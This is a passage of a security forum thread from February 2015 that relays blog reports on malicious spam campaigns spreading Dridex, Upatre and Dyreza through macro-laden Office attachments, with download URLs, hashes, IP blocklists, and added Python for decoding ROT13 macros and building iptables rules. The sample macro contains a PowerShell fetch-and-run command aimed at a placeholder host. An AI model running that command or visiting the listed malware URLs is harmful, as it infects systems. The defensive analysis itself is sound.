** https://www.virustotal.com/en/file/2ad9b362775fe8a5a70ea4707325699123480e2827abdd2893ff566b80e86ea8/analysis/1423835772/
*** https://www.virustotal.com/en/file/c6d838b4f4635bdc23f12cb0961cbf2ed7d8358eb7259c71946aa2d3cdd816cf/analysis/1423836506/
**** https://www.virustotal.com/en/file/03a7986ae0b058e1471c549ea18dfe76a6ab162d7f696509a7f57e2abbafbdef/analysis/1423836488/
___
Fake 'PURCHASE ORDER' SPAM - doc malware
- http://myonlinesecurity.co.uk/alison-longworth-universal-sealants-uk-limited-purchase-order-34663-word-doc-malware/
13 Feb 2015 - "'Alison Longworth PURCHASE ORDER (34663)' pretending to come from Alison Longworth <ALongworth@ usluk .com> with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/Alison-Longworth-Universal-Sealants-UK-Limited-PURCHASE-ORDER-34663.png
13 February 2015 : 2600_001.doc - Current Virus total detections: 0/46*
... which downloads stroygp .ru/js/bin.exe which is a -dridex- banking trojan and has a virus total detection rate of 9/57**... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/24520902dd5f51a74a64dcff26a16b38b2ad7a4921ef2658708eb81069ae2a85/analysis/1423834978/
** https://www.virustotal.com/en/file/307680f7fd5bd0e5828ed3d52450300b27acc575d3d62a6110a81a691a5cab56/analysis/1423836333/
... Behavioural information
TCP connections
37.139.47.105: https://www.virustotal.com/en/ip-address/37.139.47.105/information/
210.181.222.118: https://www.virustotal.com/en/ip-address/210.181.222.118/information/
86.104.134.156: https://www.virustotal.com/en/ip-address/86.104.134.156/information/
___
Something evil on 95.163.121.0/24
- http://blog.dynamoo.com/2015/02/something-evil-on-95163121024-digital.html
13 Feb 2015 - "I've written about DINETHOSTING* aka Digital Network JSC many times before, and frankly their entire IP range is a sea of crap, and I have a whole load of blocks in the 95.163.64.0/18 range (including the entirety of 95.163.64.0/10). This latest sea of badness seems to be suballocated to a customer using the 95.163.121.0/24 block.
* http://blog.dynamoo.com/search/label/DINETHOSTING
inetnum: 95.163.121.0 - 95.163.121.255
netname: RU-CLOUDAVT-NET
descr: LLC ABT Cloud Network
country: RU ...
descr: Digital Network JSC
descr: Moscow, Russia ...
Just looking at blog posts, I can see badness occurring in the recent past... That's quite a high concentration of bad servers in a relatively small block. A quick look at what is currently hosted indicates (IMHO) nothing of value, and I would recommend blocking the entire 95.163.121.0/24 range as a precaution."
___
Fake Email 'Internet Fax' SPAM - trojan
- http://blog.mxlab.eu/2015/02/13/email-internet-fax-job-contains-trojan/
Feb 13, 2015 - "... intercepted a new trojan distribution campaign by email with the subject “Internet Fax Job”. This email is sent from the spoofed address “Fax job <no-replay@ fax-job .com>” and has the following body:
Image data has been attached.
The attached file Docs.zip contains the 26 kB large file Docs.exe. The trojan is known as UDS:DangerousObject.Multi.Generic, TrojanDownloader:Win32/Upatre.AW, HEUR/QVM19.1.Malware.Gen or Win32.Trojan.Inject.Auto. At the time of writing, 7 of the 57 AV engines did detect the trojan at Virus Total*..."
* https://www.virustotal.com/en/file/d507bf4d17e28d58c1692e357f3937c5eeabfe05539bc5bfcb9e9880de593349/analysis/
___
Google International Lottery Spam
- http://threattrack.tumblr.com/post/110812572283/google-international-lottery-spam
12 Feb 2015 - "Subjects Seen:
GOOGLE int
Typical e-mail details:
Congratulations on your victory in the international lottery GOOGLE INT and win in the amount of 10,000 euro.
For winning fill out the form and send it to us investing in response.
Malicious File Name and MD5:
form.exe (433DF3A8CD60E501EE0CB5B4849D82DC)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/7f85cf5980d4bb5f1cb67c0871a8f8d5/tumblr_inline_njnzco42TJ1r6pupn.png
Tagged: Google, Lottery, Upatre
- http://myonlinesecurity.co.uk/congratulations-victory-international-lottery-google-int-fake-pdf-malware/
12 Feb 2015
> https://www.virustotal.com/en/file/288e53e14cd980925286bddb5bd48d05e5deed96e0c311fee14677f4e926420d/analysis/1423755189/
... Behavioural information
TCP connections
216.146.43.70: https://www.virustotal.com/en/ip-address/216.146.43.70/information/
92.240.99.70: https://www.virustotal.com/en/ip-address/92.240.99.70/information/
46.30.212.195: https://www.virustotal.com/en/ip-address/46.30.212.195/information/
UDP communications
198.27.81.168: https://www.virustotal.com/en/ip-address/198.27.81.168/information/
192.95.17.62: https://www.virustotal.com/en/ip-address/192.95.17.62/information/
:fear: :mad:
AplusWebMaster
2015-02-16, 13:19
FYI...
Fake 'invoice' SPAM - doc malware
- http://blog.dynamoo.com/2015/02/malware-spam-tag-automotive-group-ltd.html
16 Feb 2015 - "This -fake- invoice does not come from The Automotive Group Ltd or any similarly-named company. Their systems have not been compromised in any way. Instead, this is a -forgery- with a malicious attachment. Note that taghire .co.uk simply shows "Under Construction".
From: Lawrence Fisher [l.fisher@ taghire .co .uk]
Date: 16 February 2015 at 08:25
Subject: invoice
Here is the invoice
Kind Regards,
Lawrence Fisher
T.A.G. (The Automotive Group) Ltd.
Unit 22 Coney Green Business Centre Wingfield View, Clay Cross, Chesterfield...
So far I have only seen one sample of this, with an attachment named Invoice 0215.doc which has zero detections according to VirusTotal*. It contains an obfuscated Word macro which downloads an additional component from:
http ://laikah .de/js/bin.exe
Usually there are two or three versions of this document, but I have only seen one. If you look at the macro code itself, the download location is not encrypted in the code although other elements of the process are encrypted with a string + key combination. Those combinations contain non-printable characters, possibly in an attempt to avoid analysis. This .exe file is downloaded as %TEMP%\345435.exe and it has a VirusTotal detection rate of 3/57**. Automated reporting tools... show that this POSTS to 37.139.47.105. It appears that communication is attempted with the following IPs:
37.139.47.105 (Pirix, Russia)
78.140.164.160 (Webazilla, US)
95.163.121.179 (Digital Networks, Russia)
86.104.134.156 (One Telecom, Moldova)
117.223.58.214 (BSNL / Broadband Multiplay, India)
109.234.38.70 (McHost, Russia)
Also, according to the Malwr report***, a DLL is dropped with a detection rate of 3/57.
Recommended blocklist:
37.139.47.105
78.140.164.160
95.163.121.179
86.104.134.156
117.223.58.214
109.234.38.70 "
* https://www.virustotal.com/en/file/ac8ad9153e36a3d3644f890770259bcd8c77a10c0eff512b4a1fccecc3eb9e26/analysis/1424078591/
** https://www.virustotal.com/en/file/971403cb96c22acecd030aeb7b25da08fd10af4a85877d8d2c49a8ac26a90796/analysis/1424078636/
*** https://malwr.com/analysis/Yzg4MGU5M2ViNzIzNGRlZDk0ZWFhNzUwOTQ3NjYwMDg/
- http://myonlinesecurity.co.uk/lawrence-fisher-t-g-automotive-group-ltd-invoice-word-doc-malware/
16 Feb 2015
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/tag-invoice.png
___
Fake 'order' SPAM - doc malware
- http://myonlinesecurity.co.uk/la-plastic-order-66990-word-doc-malware/
16 Feb 2015 - "'L&A Plastic Order# 66990' pretending to come from Hannah <Hannah@ lapackaging .com> with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/LA-Plastic-Order-66990.png
This email has exactly the same malware although different file/document name as today’s versions of Lawrence Fisher T.A.G. (The Automotive Group) Ltd invoice - Word doc malware* and downloads the same dridex banking Trojan** from the same locations***... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* http://myonlinesecurity.co.uk/lawrence-fisher-t-g-automotive-group-ltd-invoice-word-doc-malware/
** https://www.virustotal.com/en/file/ac8ad9153e36a3d3644f890770259bcd8c77a10c0eff512b4a1fccecc3eb9e26/analysis/1424075902/
*** https://www.virustotal.com/en/file/971403cb96c22acecd030aeb7b25da08fd10af4a85877d8d2c49a8ac26a90796/analysis/1424078802/
... Behavioural information
TCP connections
37.139.47.105: https://www.virustotal.com/en/ip-address/37.139.47.105/information/
UDP communications
134.170.185.211: https://www.virustotal.com/en/ip-address/134.170.185.211/information/
___
Fake 'Copy of transaction' SPAM - xls malware
- http://blog.dynamoo.com/2015/02/malware-spam-re-data-request-id91460.html
16 Feb 2015 - "This rather terse spam comes with a malicious attachment:
From: Rosemary Gibbs
Date: 16 February 2015 at 10:12
Subject: Re: Data request [ID:91460-2234721]
Copy of transaction.
The sender's name, the ID: number and the name of the attachment vary in each case. Example attachment names are:
869B54732.xls
BE75129513.xls
C39189051.xls
None of the three attachments are detected by anti-virus vendors [1] [2] [3]. They each contain a slightly different macro... It's quite apparent that this is ROT13 encoded which you can easily decrypt at http://www.rot13.com/index.php rather than working through the macro... So, these macros are attempting to use Powershell to download and execute the next step (possibly to avoid the UAC popup). The downloaded binary has a VirusTotal detection rate of 3/57* and automated analysis tools... show attempted communications with:
85.143.166.72 (Pirix, Russia)
205.185.119.159 (FranTech Solutions, US)
92.63.88.87 (MWTV, Latvia)
173.226.183.204 (TW Telecom, Taiwan)
27.5.199.115 (Hathway Cable and Datacom, India)
149.171.76.124 (University Of New South Wales, Australia)
46.19.143.151 (Private Layer, Switzerland)
It also drops a DLL with a 4/57** detection rate which is the same malware seen in this attack***.
Recommended blocklist:
85.143.166.72
205.185.119.159
92.63.88.87
173.226.183.204
27.5.199.115
149.171.76.124
46.19.143.151 "
1] https://www.virustotal.com/en/file/b361fca70eb53e8e6a6aceaf2a4d967a64ec0459ced4f6b401d40a50d49c79c6/analysis/1424087084/
2] https://www.virustotal.com/en/file/751f4d5dfb764ca6658bf7dd125fad6af3037ed89238d2d4e1613b8e3afc5568/analysis/1424087089/
3] https://www.virustotal.com/en/file/687e6133782403537221b32503eba5cb5fd360973bc57a5e8be0fa49aa180e23/analysis/1424087096/
* https://www.virustotal.com/en/file/f3a359c36d63466abb988d8b4aa96dd8fef6fd4450dd09c123c6aa8f513d1bba/analysis/1424087041/
** https://www.virustotal.com/en/file/084a4bf0dc1ccb9f1c99f94b13fc85253dc40bce9ef996239053ae5c4b7fe1e9/analysis/1424088561/
*** http://blog.dynamoo.com/2015/02/malware-spam-tag-automotive-group-ltd.html
- http://myonlinesecurity.co.uk/copy-transaction-re-data-request-id20169-182-excel-xls-malware/
16 Feb 2015
___
Fake 'Order' SPAM - doc malware
- http://blog.dynamoo.com/2015/02/malware-spam-l-plastic-order-66990.html
16 Feb 2015 - "This -fake- financial spam does not come from LA Packaging, their systems are not compromised in any way. Instead, this is a simple -forgery- with a malicious attachment:
From: Hannah [Hannah@ lapackaging .com]
Date: 16 February 2015 at 10:38
Subject: L&A Plastic Order# 66990
For your records, please see attached L&A Order# 66990 and credit card receipt.
It has shipped today via UPS Ground Tracking# 1Z92X9070369494933
Best Regards,
Hannah – Sales
L&A Plastic Molding / LA Packaging
714-694-0101 Tel - Ext. 110
714-694-0400 Fax
E-mail: Hannah@ LAPackaging .com
Attached is a malicious Word document 66990.doc - so far I have only seen one version of this, although there are usually several variants. This document contains a macro... an executable from:
http :// hoodoba.cba .pl/js/bin.exe = 95.211.144.65: https://www.virustotal.com/en/ip-address/95.211.144.65/information/
At present this has a detection rate of 6/57*. It is the same malware as seen in this spam run**."
* https://www.virustotal.com/en/file/971403cb96c22acecd030aeb7b25da08fd10af4a85877d8d2c49a8ac26a90796/analysis/1424089760/
** http://blog.dynamoo.com/2015/02/malware-spam-tag-automotive-group-ltd.html
- http://myonlinesecurity.co.uk/la-plastic-order-66990-word-doc-malware/
16 Feb 2015
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/LA-Plastic-Order-66990.png
___
Money mule SCAM
- http://blog.dynamoo.com/2015/02/money-mule-scam-gbearncom-usaearnscom.html
16 Feb 2015 - "This spam email is attempting to recruit people to aid with money laundering ("money mules") and other illegal operations.
Date: 16 February 2015 at 21:29
Subject: New offer
Good day!
We considered your resume to be very attractive and we thought the vacant position in our company could be interesting for you.
Our firm specializes in advertisment services realizing unique products of creative advertising and branding strategies
and solutions to develop a distinctive brand value.
We cooperate with different countries and currently we have many clients in the USA and the EU.
Due to this fact, we need to increase the number of our destination representatives' regular staff.
In their duties will be included the document and payment control of our clients.
Part-time employment is currently important.
We offer a wage from 3500 GBP per month.
If you are interested in our offer, mail to us your answer on riley@ gbearn .com and
we will send you an extensive information as soon as possible.
Respectively submitted
Personnel department
The reply-to address of gbearn .com has recently been registered by the -scammers- with false WHOIS details. There is also an equivalent domain usaearns .com for recruiting US victims. Although there is no website, both domains have a mail server at 93.188.167.170 (Hostinger, US) which also serves as one of the nameservers for these domains (ns1 .recognizettrauma .net). The other nameserver (ns2 .recognizettrauma .net) is on 75.132.186.90 (Charter Communications, US). Be in no doubt that the job being offered here is -illegal- and you should most definitely avoid it."
___
Banking Trojan Dyreza sends 30,000 malicious emails in one day
- http://net-security.org/malware_news.php?id=2964
16.02.2015 - "A massive spam wave is installing banking Trojan Dyreza on tens of thousands of computers to steal sensitive financial data from unsuspecting customers, warns Bitdefender*. 30,000 malicious emails were sent in just one day from spam servers in the UK, France, Turkey, US and Russia. The spam, which has been directed to customers of UK banks including NatWest, Barclays, RBS, HSBC, Lloyds Bank and Santander, carries links to HTML files which direct users to URLs pointing to highly obfuscated Javascript code. This automatically downloads a zip archive from a remote location... each downloaded archive is named differently to bypass antivirus solutions. This technique is called server-side polymorphism and ensures that the downloaded malicious file is always brand new. To take the con one step further, the same Javascript code -redirects- the user to the localized webpage of a fax service provider as soon as the archive is downloaded..."
* http://www.hotforsecurity.com/blog/banking-trojan-lurking-inside-innocent-fax-messages-bitdefender-warns-11368.html
___
Banking malware VAWTRAK - malicious macro downloaders
> http://blog.trendmicro.com/trendlabs-security-intelligence/banking-malware-vawtrak-now-uses-malicious-macros-abuses-windows-powershell/
Feb 16, 2015
:fear::fear: :mad:
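The ROT13 macro in the 'Copy of transaction' post above is a good case for scripting the decode rather than pasting strings into a web form: the same literal-by-literal approach finds the download URL and the PowerShell command in any macro that uses the trick. The script below is an added example, not code from this thread or from dynamoo; the macro text in it is constructed in the style described, and the host name and drop path in it are placeholders, not the real download location from any of the spam runs. It scores every double-quoted string literal before and after ROT13 against a short list of downloader keywords, keeps the ones that only make sense decoded, and extracts URLs and file names from the result.

```python
import codecs
import re

# Constructed sample, modelled on the ROT13-obfuscated Excel macros described
# above. The host name and drop path are hypothetical placeholders, not the
# real download location used by any of the spam runs.
SAMPLE_MACRO = r'''
Private Sub Workbook_Open()
    Dim enc As String
    enc = "cbjrefuryy -RkrphgvbaCbyvpl olcnff -abcebsvyr -pbzznaq (Arj-Bowrpg Flfgrz.Arg.JroPyvrag).QbjaybnqSvyr('uggc://rknzcyr.vainyvq/wf/ova.rkr','%GRZC%\ova.rkr'); Fgneg-Cebprff '%GRZC%\ova.rkr'"
    Shell Decode(enc), vbHide
End Sub

Private Function Decode(s As String) As String
    ' rotates every letter by 13 places (body omitted in this constructed sample)
End Function
'''

# Words that rarely appear in a benign spreadsheet macro but almost always in
# a downloader; matched case-insensitively against decoded text.
SUSPICIOUS = ("powershell", "downloadfile", "webclient", "start-process",
              "shell", "wscript", "cmd", "-executionpolicy", "bypass",
              "http://", "https://", ".exe", ".cab", "%temp%")

STRING_LITERAL = re.compile(r'"([^"\r\n]*)"')
URL_RE = re.compile(r'''https?://[^\s'"<>)]+''', re.IGNORECASE)
FILE_RE = re.compile(r"[\w%\\.-]+\.(?:exe|cab|scr|dll)\b", re.IGNORECASE)


def rot13(text):
    """ROT13 is its own inverse, so one call both encodes and decodes."""
    return codecs.decode(text, "rot_13")


def suspicion_score(text):
    """Number of distinct suspicious keywords present in the text."""
    low = text.lower()
    return sum(1 for k in SUSPICIOUS if k in low)


def decode_literals(macro_text):
    """Return (literal, decoded, score) for each double-quoted string whose
    ROT13 form scores higher than the literal itself, i.e. hides code."""
    hits = []
    for lit in STRING_LITERAL.findall(macro_text):
        dec = rot13(lit)
        if suspicion_score(dec) > suspicion_score(lit):
            hits.append((lit, dec, suspicion_score(dec)))
    return hits


def analyze_macro(macro_text):
    """Decode hidden literals and pull out what an analyst wants from them:
    download URLs, dropped file names and the suspicious keywords seen."""
    decoded = [dec for _, dec, _ in decode_literals(macro_text)]
    joined = "\n".join(decoded)
    return {
        "decoded": decoded,
        "urls": sorted(set(URL_RE.findall(joined))),
        "files": sorted(set(FILE_RE.findall(joined))),
        "keywords": sorted(k for k in SUSPICIOUS if k in joined.lower()),
    }


if __name__ == "__main__":
    result = analyze_macro(SAMPLE_MACRO)
    for line in result["decoded"]:
        print("decoded :", line)
    print("urls    :", result["urls"])
    print("files   :", result["files"])
    print("keywords:", result["keywords"])
```

The before/after scoring is what makes this safe to run over every literal in a document: a benign string scores the same either way and is ignored, so only the hidden payload surfaces. Swapping rot13() for a reverse, base64 or single-byte XOR decode covers the other one-step obfuscations seen in these runs; it will not help where the URL is assembled at runtime from many fragments, which is where a sandbox run or a VBA emulator is the next step.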
AplusWebMaster
2015-02-17, 16:37
FYI...
Something evil on 92.63.88.0/24 (MWTV, Latvia)
- http://blog.dynamoo.com/2015/02/something-evil-on-926388024-mwtv-latvia.html
17 Feb 2015 - "I've been tracking -Dridex- for some time, and I keep seeing IPs for MWTV in Latvia cropping up. So far I have seen:
92.63.88.87
92.63.88.97
92.63.88.100
92.63.88.105
92.63.88.106
92.63.88.108
I'm not sure how widely this spreads through the MWTV network, but I would certainly recommend -blocking- 92.63.88.0/24 on your network perimeter."
___
Fake 'Customer statement' SPAM - doc malware
- http://myonlinesecurity.co.uk/customer-statement-0001031389-02052015-word-doc-malware/
17 Feb 2015 - "'Customer statement 0001031389 as on 02/05/2015' pretending to come from AR.Support@efi.com and being addressed to minutemanpresschicago@ comcast .net and sent to you via a bcc with a malicious word doc attachment is another one from the current bot runs... All these emails have random invoice numbers in the subject line and the invoice number matches the attachment name & number in most cases so far today...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/Customer-statement-0001031389.png
17 February 2015 : Customer statement 0001031389 as on 02052015.DOC
Current Virus total detections: 0/57* ... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/5ea46cf547995e30dc0f23bf3bd622195412cfdabc82b955e84cd5fdd4344d1e/analysis/1424169255/
- http://blog.dynamoo.com/2015/02/malware-spam-arsupporteficom-customer.html
17 Feb 2015
"... Recommended blocklist:
202.44.54.5
66.110.179.66
92.63.88.105 "
___
Fake 'Service Suspension' SPAM - xls malware
- http://myonlinesecurity.co.uk/service-suspension-notification-idfecc254778-excel-xls-malware/
17 Feb 2015 - "'Service Suspension Notification (random numbers)' with a malicious Excel XLS attachment is another one from the current bot runs... All these emails have random numbers in the subject line and the attachment name...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/Service-Suspension-Notification.png
17 February 2015 : FECC254778.xls
Current Virus total detections: 1/57* ... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/ce7d7d4b45116fc63d22e1031811ce3eccea5338c19744dd9e481307cef0a4da/analysis/1424174070/
___
Fake 'Unpaid invoice' SPAM – XLS malware
- http://myonlinesecurity.co.uk/unpaid-invoice-excel-xls-malware/
17 Feb 2015 - "'Unpaid invoice [ID:AFCBF43812] ( random numbers)' with a malicious Excel XLS attachment is another one from the current bot runs... All these emails have random invoice numbers in the subject line and the invoice number matches the attachment name & number in most cases so far today. The email has a totally -blank- body...
17 February 2015 : AFCBF43812.xls - Current Virus total detections: 1/57* ... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/f0694d38c88c19bf3f891b90cbed7588a0234895c93f819a88bf27e22550f2fc/analysis/1424178689/
- http://blog.dynamoo.com/2015/02/malware-spam-unpaid-invoice-id9876543210.html
17 Feb 2015
"... fake invoice comes with no body text, a random ID: in the subject and a randomly-named malicious Excel attachment...
Recommended blocklist:
92.63.88.97
92.63.88.87
78.129.153.27
62.76.43.194
46.4.232.206
136.243.237.194
74.208.68.243 "
___
Fake 'Invoices' SPAM - PDF malware
- http://myonlinesecurity.co.uk/invoices-for-intercon-inc-sent-on-021715-from-electroshield-inc-fake-pdf-malware/
17 Feb 2015 "'Invoices for INTERCON, INC. Sent on 02/17/15 from Electroshield Inc' pretending to come from accounting@ interconinc .com with a zip attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/Invoices-for-INTERCON.png
17 February 2015: invoices.zip: Extracts to: invoices.exe
Current Virus total detections: 7/57* ... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/bff78dcece3b65ca5280da4a493623df0f1b105e25fc34b43e79d2677e33c448/analysis/1424188090/
___
FedEx Notification Spam
- http://threattrack.tumblr.com/post/111277461208/fedex-notification-spam
Feb 17, 2015 - "Subjects Seen
Postal Notification Service
Typical e-mail details:
Dear Customer,
You parcel arrived, read the account in the attachment.
Consignment: #149700366
Submit time: Tue, 17 Feb 2015 11:11:55 +0000
Malicious File Name and MD5:
invoice.exe (6E3EF30E49B69E8AA6F487816A4AC9F9)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/57956026dff9ee9ed16b0be08a0089ed/tumblr_inline_njx66dQFbG1r6pupn.png
Tagged: FedEx, Upatre
___
Equation Group IP ranges and domains
- http://blog.dynamoo.com/2015/02/an-analysis-of-reported-equation-group.html
17 Feb 2015 - "There has been a lot of buzz this morning about "The Equation Group", a possible state actor involved in placing malware on hard disks..."
(Good read, but WAY too many IPs to be listed here - see the dynamoo URL above.)
- https://isc.sans.edu/diary.html?storyid=19345
2015-02-17
- http://www.theregister.co.uk/2015/02/17/kaspersky_labs_equation_group/
17 Feb 2015
:fear::fear: :mad:
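The 'Recommended blocklist' sections in the posts above are the raw material for perimeter rules, but they arrive as small per-campaign lists with repeats, and the MWTV and Digital Network posts show why an analyst sometimes widens a handful of hosts into the whole /24. The script below is an added example, not code from this thread or from dynamoo, that parses those sections, widens any /24 from which three or more distinct hosts have been listed (the threshold is an assumption of this example, chosen to mirror the /24 recommendations above), merges overlapping entries and renders egress rules. The sample text is constructed from the addresses the posts list; the lone '95.163.121.0/24' entry is the recommendation from the Digital Network post written as a list entry so the parser also sees a CIDR.

```python
import ipaddress
import re

# Constructed input: "Recommended blocklist" sections in the shape they appear
# in the posts above. The addresses are the ones those posts list; the single
# CIDR entry is the 95.163.121.0/24 recommendation rewritten as a list line.
SAMPLE_POSTS = """
Recommended blocklist:
85.143.166.72
46.19.143.151
193.206.162.92
92.63.88.87
78.129.153.18
205.185.119.159 "
___
Recommended blocklist:
95.163.121.0/24
___
Recommended blocklist:
37.139.47.105
78.140.164.160
95.163.121.179
86.104.134.156
117.223.58.214
109.234.38.70 "
___
Recommended blocklist:
85.143.166.72
205.185.119.159
92.63.88.87
173.226.183.204
27.5.199.115
149.171.76.124
46.19.143.151 "
___
"... Recommended blocklist:
202.44.54.5
66.110.179.66
92.63.88.105 "
___
Recommended blocklist:
92.63.88.97
92.63.88.87
78.129.153.27
62.76.43.194
46.4.232.206
136.243.237.194
74.208.68.243 "
"""

ENTRY = re.compile(r"^\s*(\d{1,3}(?:\.\d{1,3}){3}(?:/\d{1,2})?)")


def parse_blocklists(text):
    """Collect every IP or CIDR that follows a 'Recommended blocklist' line,
    stopping at the first line that is not an address. A bare address
    becomes a /32 network so everything downstream handles one type."""
    entries = set()
    collecting = False
    for line in text.splitlines():
        if "Recommended blocklist" in line:
            collecting = True
            continue
        if not collecting:
            continue
        m = ENTRY.match(line)
        if not m:
            collecting = False
            continue
        try:
            entries.add(ipaddress.ip_network(m.group(1), strict=False))
        except ValueError:
            pass  # malformed token: skip it rather than abort the whole parse
    return entries


def widen_hot_subnets(networks, threshold=3):
    """Policy choice (an assumption of this example): once `threshold`
    distinct hosts from one /24 have been listed, block the whole /24."""
    hosts_by_24 = {}
    wider = []
    for net in networks:
        if net.prefixlen == 32:
            hosts_by_24.setdefault(net.supernet(new_prefix=24), set()).add(net)
        else:
            wider.append(net)
    for parent, hosts in hosts_by_24.items():
        if len(hosts) >= threshold:
            wider.append(parent)
        else:
            wider.extend(hosts)
    # merge adjacent ranges and drop entries already covered by a wider one
    return sorted(ipaddress.collapse_addresses(wider))


def build_blocklist(text, threshold=3):
    return widen_hot_subnets(parse_blocklists(text), threshold)


def is_blocked(ip, networks):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in networks)


def iptables_rules(networks, chain="OUTPUT"):
    """Egress rules: the downloader's C2 check-in is outbound, so rejecting
    the destination is what stops an infected host phoning home."""
    return [f"iptables -A {chain} -d {net} -j REJECT" for net in networks]


if __name__ == "__main__":
    nets = build_blocklist(SAMPLE_POSTS)
    for rule in iptables_rules(nets):
        print(rule)
    print("92.63.88.200 blocked:", is_blocked("92.63.88.200", nets))
```

Widening to a /24 trades some collateral damage for coverage of the next IP the same hoster hands out; keep the threshold high for large providers and low for ranges that the posts above already describe as nothing but bad. Rules like these only protect hosts whose traffic actually crosses the device they are loaded on, so laptops off the corporate network still need the host-level controls.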
AplusWebMaster
2015-02-18, 14:49
FYI...
Multiple SPAM emails using malicious XLS or XLSM attachment
- http://blog.dynamoo.com/2015/02/multiple-spam-emails-using-malicious.html
18 Feb 2015 - "I'm seeing multiple spam runs (probably pushing the Dridex banking trojan) with no-body-text, various subjects and either an XLS or XLSM attachment. Example subjects include:
Copy attaced
RE: Requests documentation [458C28133]
Request error [C3843]
Request error [FDF396530]
Requests documentation [242B035667]
Attachments look something similar to this:
15E376774.xlsm
242B035667.xlsm
458C28133.xls
C3843.xls
FDF396530.xlsm
The XLS and XLSM files are different structurally... the XLSM files are basically an Office 2007 ZIP archive of all the data components, the XLS files are old-school Office 2003 files. Nevertheless, they contain a macro with 23 components to make it harder to analyse, although the important modules are Module 11 which contains the text string to decrypt, and Module 14 which contains the decryption function itself. Almost everything else is irrelevant. Once the string is decrypted, it becomes fairly obvious what is going on. So far, there appear to be four strings with different download locations... we can see a file dxzq.jpg being downloaded which is actually a CAB file (JIOiodfhioIH.cab) which is then expanded to JIOiodfhioIH.exe and then run. For information, these IPs are hosted by:
5.196.243.7 (OVH, Ireland)
46.30.42.151 (Eurobyte LLC, Russia)
176.31.28.235 (OVH, France)
92.63.88.63 (MWTV, Latvia)
This executable has a detection rate of 4/56. Automated analysis... shows attempted network connections to:
82.151.131.129 (Doruknet, Turkey)
121.50.43.175 (Tsukaeru.net, Japan)
74.208.68.243 (1&1, US)
The Malwr report shows that it also drops a DLL with a detection rate of just 1/56*.
Recommended blocklist:
82.151.131.129
121.50.43.175
74.208.68.243
5.196.243.7
46.30.42.151
176.31.28.235
92.63.88.63 ..."
* https://www.virustotal.com/en/file/2884d4315258fab8917731b996b7536470558f7f61e969be469e1f874e50d9d5/analysis/1424263599/
- http://myonlinesecurity.co.uk/excel-xlsm-malware/
18 Feb 2015 - "... The email has a totally-blank-body..."
> https://www.virustotal.com/en/file/3b1b023a27a27a500815da2dc15943ca679e6abfbe02bea050a94adb42e0609a/analysis/1424262074/
___
Fake 'Thank you' SPAM – PDF malware
- http://myonlinesecurity.co.uk/thank-you-for-your-payment-fake-pdf-malware/
18 Feb 2015 - "'Thank you for your payment' pretending to come from nycserv@ finance .nyc .gov with a zip attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/Thank-you-for-your-payment.png
18 February 2015: attachment.zip : Extracts to: attachment.exe
Current Virus total detections: 9/57* ... This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/ef74c90eaf5bad3b27c12991c05d858173e7c5971655cb2e3fb165738b311e69/analysis/1424277505/
... Behavioural information
TCP connections
91.198.22.70: https://www.virustotal.com/en/ip-address/91.198.22.70/information/
31.43.236.251: https://www.virustotal.com/en/ip-address/31.43.236.251/information/
50.87.148.213: https://www.virustotal.com/en/ip-address/50.87.148.213/information/
UDP communications
77.72.174.161: https://www.virustotal.com/en/ip-address/77.72.174.161/information/
77.72.174.160: https://www.virustotal.com/en/ip-address/77.72.174.160/information/
___
Fake 'Esso E-bill' SPAM – doc malware
- http://blog.dynamoo.com/2015/02/malware-spam-uk-fuels-esso-e-bill.html
18 Feb 2015 - "This fake invoice is a -forgery- with a malicious attachment:
From: invoices@ ebillinvoice .com
Date: 18 February 2015 at 09:01
Subject: UK Fuels Esso E-bill
Customer No : 90714
Email address : [redacted]
Attached file name : 36890_06_2015.DOC (ZIP)
Dear Customer
Please find attached your invoice for Week 06 2015.
If you have any queries regarding your e-bill you can contact us at invoices@ ebillinvoice .com.
Alternatively you can log on to your account at www .velocitycardmanagement .com to review your transactions and manage your account online.
Yours sincerely
Customer Services
UK Fuels...
I have only seen a single sample of this, with a ZIP file 36890_06_2015.zip attached, which in turn contains a document 36890_06_2015.doc. This document contains a malicious macro, and is exactly the same as the one used in this campaign* leading to the Dridex banking trojan."
* http://blog.dynamoo.com/2015/02/this-fake-financial-spam-has-malicious.html
- http://myonlinesecurity.co.uk/uk-fuels-esso-e-bill-word-doc-malware/
18 Feb 2015
> https://www.virustotal.com/en/file/07649dcb0d2f4661f3b9fea0450cd0e103f5a4b186fca02e652f94b59a80be8f/analysis/1424251443/
___
Fake 'auto insurance' SPAM - doc malware
- http://blog.dynamoo.com/2015/02/this-fake-financial-spam-has-malicious.html
18 Feb 2015 - "This -fake- financial spam has a malicious attachment:
From: Dan Bigelow [dan@ express-insurance .net]
Date: 18 February 2015 at 09:18
Subject: Auto insurance apps and documents
Hello ,
